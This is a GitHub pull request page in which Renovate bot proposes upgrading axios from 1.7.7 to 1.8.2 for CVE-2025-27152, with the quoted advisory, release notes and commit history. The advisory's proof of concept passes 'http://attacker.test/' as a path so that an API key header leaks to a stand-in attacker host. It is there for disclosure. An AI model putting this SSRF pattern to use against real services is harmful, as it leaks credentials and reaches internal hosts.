Skip to content

fix(deps): update dependency axios to v1.8.2 [security] - abandoned #138

New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom
Open
wants to merge 2 commits into
base: main
Choose a base branch
from
Open

fix(deps): update dependency axios to v1.8.2 [security] - abandoned #138

wants to merge 2 commits into from

Conversation

renovate[bot]
Copy link
Contributor

@renovate renovate bot commented Mar 27, 2025
edited
Loading

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
axios (source) 1.7.7 -> 1.8.2 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2025-27152

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.

PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
  1. Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
  1. Run the script:
$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact

  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

Release Notes

axios/axios (axios)

v1.8.2

Compare Source

Bug Fixes
  • http-adapter: add allowAbsoluteUrls to path building (#​6810) (fb8eec2)
Contributors to this release

v1.8.1

Compare Source

Bug Fixes
  • utils: move generateString to platform utils to avoid importing crypto module into client builds; (#​6789) (36a5a62)
Contributors to this release

v1.8.0

Compare Source

Bug Fixes
Features
Reverts
BREAKING CHANGES

  • code relying on the above will now combine the URLs instead of prefer request URL

  • feat: add config option for allowing absolute URLs

  • fix: add default value for allowAbsoluteUrls in buildFullPath

  • fix: typo in flow control when setting allowAbsoluteUrls

Contributors to this release

1.7.9 (2024-12-04)

Reverts
Contributors to this release

1.7.8 (2024-11-25)

Bug Fixes
Contributors to this release

1.7.7 (2024-08-31)

Bug Fixes
  • fetch: fix stream handling in Safari by fallback to using a stream reader instead of an async iterator; (#​6584) (d198085)
  • http: fixed support for IPv6 literal strings in url (#​5731) (364993f)
Contributors to this release

1.7.6 (2024-08-30)

Bug Fixes
Contributors to this release

1.7.5 (2024-08-23)

Bug Fixes
  • adapter: fix undefined reference to hasBrowserEnv (#​6572) (7004707)
  • core: add the missed implementation of AxiosError#status property; (#​6573) (6700a8a)
  • core: fix ReferenceError: navigator is not defined for custom environments; (#​6567) (fed1a4b)
  • fetch: fix credentials handling in Cloudflare workers (#​6533) (550d885)
Contributors to this release

1.7.4 (2024-08-13)

Bug Fixes
Contributors to this release

1.7.3 (2024-08-01)

Bug Fixes
Contributors to this release

1.7.2 (2024-05-21)

Bug Fixes
Contributors to this release

1.7.1 (2024-05-20)

Bug Fixes
  • fetch: fixed ReferenceError issue when TextEncoder is not available in the environment; (#​6410) (733f15f)
Contributors to this release

v1.7.9

Compare Source

Reverts
Contributors to this release

v1.7.8

Compare Source

Bug Fixes
Contributors to this release

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

slugb0t and others added 2 commits March 27, 2025 11:15
@slugb0t
wip: 🚧 ✨ creating DOI badges for FAIR Archivals (#137)
df814f5 
* refactor: ♻️ Abstractions made to bot + breadcrumb removed from /dashboard + zenodo callback state rehandle (#130)

* wip: 🚧 bot workflow improvements

* feat: ✨ abstractions made to main bot file

* refactor: ♻️ remove breadcrumb in /dashboard page

* refactor: ♻️ url search params are created rather than appended + token data is created once for db calls + url decoding change in zenodo callback

* fix: 🐛 cwlObject is not const

* fix: 🐛 dont' reassign subjects at end of iterateCommitDetails fn

* fix: 🐛 allow fullCodefairRun to trigger

* fix: 🐛 add missing scope in zenodo callback

* feat: ✨ verify state before redirecting to zenodo

* fix: 🐛 refer to correct db instance

* refactor: ♻️ two modal states for metadata and license validation

* fix: 🐛 final zenodo step state handling + prettier config normalized across bot folder

* fix: 🐛 remove return on conditional PR title check

* feat: ✨ add loading states to re-validate modals

* fix: 🐛 dont update action count after reaching 0

* fix: 🐛 work with deposition drafts + update zenodo api + improve zenodo logging

* fix: 🐛 license revalidation patch + update logs during workflow

* fix: 🐛 revert last patch and update license re-validation again

* fix: 🐛 revert conditional that never happens

* merge: 🔀 merge abstractions to staging

* fix: 🐛 update imports for abstractions

* fix: 🐛 include new directory in Dockerfile

* fix: 🐛 correct parameter for getCWLFiles in checkForCompliance fn

* docs: 📝 updating changelog

* feat: ✨ add badge-maker library

* feat: ✨ expose app domain to client

* feat: ❇️ add server api and routes to generate doi and redirect to deposition

* wip: 🚧 provide doi badge to user

* refactor: ♻️ remove lib not being used in file

* refactor: ♻️ move log after badge generation
@renovate
fix(deps): update dependency axios to v1.8.2 [security]
6bd18c6
@sourcery-ai Sourcery AI
Copy link

sourcery-ai bot commented Mar 27, 2025
edited
Loading

Reviewer's Guide by Sourcery

This pull request updates the axios dependency from version 1.7.7 to 1.8.2 to address a security vulnerability (CVE-2025-27152) related to Server-Side Request Forgery (SSRF). The update includes fixes to prevent absolute URLs from bypassing the baseURL, potentially leading to credential leakage and SSRF attacks.

No diagrams generated as the changes look simple and do not need a visual representation.

File-Level Changes

Change Details Files
The axios dependency was updated to address a security vulnerability related to Server-Side Request Forgery (SSRF) when using protocol-relative or absolute URLs with a baseURL.
  • Updated axios from version 1.7.7 to 1.8.2.
  • Implemented a fix to prevent SSRF vulnerabilities by adding allowAbsoluteUrls to path building.
  • Addressed an issue where absolute URLs could bypass the baseURL, leading to potential credential leakage.
  • Included changes to avoid importing the crypto module into client builds.
  • Added a configuration option to ignore absolute URLs.
 bot/yarn.lock
Tips and commands

Interacting with Sourcery

  • Trigger a new review: Comment @sourcery-ai review on the pull request.
  • Continue discussions: Reply directly to Sourcery's review comments.
  • Generate a GitHub issue from a review comment: Ask Sourcery to create an
    issue from a review comment by replying to it. You can also reply to a
    review comment with @sourcery-ai issue to create an issue from it.
  • Generate a pull request title: Write @sourcery-ai anywhere in the pull
    request title to generate a title at any time. You can also comment
    @sourcery-ai title on the pull request to (re-)generate the title at any time.
  • Generate a pull request summary: Write @sourcery-ai summary anywhere in
    the pull request body to generate a PR summary at any time exactly where you
    want it. You can also comment @sourcery-ai summary on the pull request to
    (re-)generate the summary at any time.
  • Generate reviewer's guide: Comment @sourcery-ai guide on the pull
    request to (re-)generate the reviewer's guide at any time.
  • Resolve all Sourcery comments: Comment @sourcery-ai resolve on the
    pull request to resolve all Sourcery comments. Useful if you've already
    addressed all the comments and don't want to see them anymore.
  • Dismiss all Sourcery reviews: Comment @sourcery-ai dismiss on the pull
    request to dismiss all existing Sourcery reviews. Especially useful if you
    want to start fresh with a new review - don't forget to comment
    @sourcery-ai review to trigger a new review!
  • Generate a plan of action for an issue: Comment @sourcery-ai plan on
    an issue to generate a plan of action for it.

Customizing Your Experience

Access your dashboard to:

  • Enable or disable review features such as the Sourcery-generated pull request
    summary, the reviewer's guide, and others.
  • Change the review language.
  • Add, remove or edit custom review instructions.
  • Adjust other review settings.

Getting Help

sourcery-ai[bot]
sourcery-ai bot reviewed Mar 27, 2025
View reviewed changes
Copy link

@sourcery-ai sourcery-ai bot left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

We have skipped reviewing this pull request. It seems to have been created by a bot (hey, renovate[bot]!). We assume it knows what it's doing!

@renovate renovate bot changed the title fix(deps): update dependency axios to v1.8.2 [security] fix(deps): update dependency axios to v1.8.2 [security] - abandoned Mar 28, 2025
@renovate Renovate
Copy link
Contributor Author

renovate bot commented Mar 28, 2025

Autoclosing Skipped

This PR has been flagged for autoclosing. However, it is being skipped due to the branch being already modified. Please close/delete it manually or report a bug if you think this is in error.

@renovate Renovate
Copy link
Contributor Author

renovate bot commented Apr 28, 2025

Edited/Blocked Notification

Renovate will not automatically rebase this PR, because it does not recognize the last commit author and assumes somebody else may have edited the PR.

You can manually request rebase by checking the rebase/retry box above.

⚠️ Warning: custom changes will be lost.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@sourcery-ai sourcery-ai[bot] sourcery-ai[bot] left review comments

Assignees
No one assigned
Labels
type: dependencies
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
1 participant
@slugb0t